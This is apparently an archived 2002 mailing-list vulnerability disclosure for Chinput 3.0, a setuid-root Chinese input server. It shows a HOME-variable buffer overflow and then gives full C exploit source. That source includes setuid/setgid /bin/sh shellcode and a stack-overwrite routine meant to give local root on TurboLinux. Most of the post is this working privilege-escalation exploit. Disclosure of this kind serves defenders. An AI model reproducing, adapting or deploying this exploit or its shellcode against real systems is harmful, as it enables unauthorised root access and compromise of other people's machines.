('binary' encoding is not supported, stored as-is) Hi, I'm xperc. I found a vulnerability in Chinput which could easily lead into a local root exploit. Chinput is a Chinese input server on UNIX/Linux. It supports XIM(X Input Method) Protocl and its own protocl for Chinese platform. $ls -l /usr/bin/chinput -rwsr-xr-x 1 root root 317272 Jan 15 21:31 /usr/bin/chinput $export HOME=`perl -e 'print "a"x800'` $/usr/bin/chinput Segmentation fault /* local exploit for Chinput 3.0 * .. tested in TurboLinux 6.5 with kernel 2.2.18 * * Usage: $gcc chinput_exp.c * $./a.out * bash-2.04$ /usr/bin/chinput * * by xpercat_private * 2002/1/16 */ #include <stdio.h> #include <stdlib.h> #define NOP 0x90 #define OFS 0x1f0 unsigned long get_esp() { __asm__("mov %esp,%eax"); } char *shellcode= "\x31\xc0\x31\xdb\xb0\x17\xcd\x80" /* setuid=0 */ "\x31\xc0\x31\xdb\xb0\x2e\xcd\x80" /* setgid=0 */ "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b" "\x33\xd2\x89\x56\x07\x89\x56\x0f" "\xb8\x1b\x56\x34\x12\x35\x10\x56" "\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd" "\x80\x33\xc0\x40\xcd\x80\xe8\xd7" "\xff\xff\xff/bin/sh"; char s[512]; char *s1; int main() { strcpy(s,"HOME="); s1=s+5; while(s1<s+260+5-strlen(shellcode)) *(s1++)=NOP; while(*shellcode) *(s1++)=*(shellcode++); *((unsigned long *)s1)=get_esp()-OFS; printf("Jump to: %p\n",*((long *)s1)); s1+=4; *s1=0; putenv(s); system("bash"); }
This archive was generated by hypermail 2b30 : Wed Jan 16 2002 - 18:10:07 PST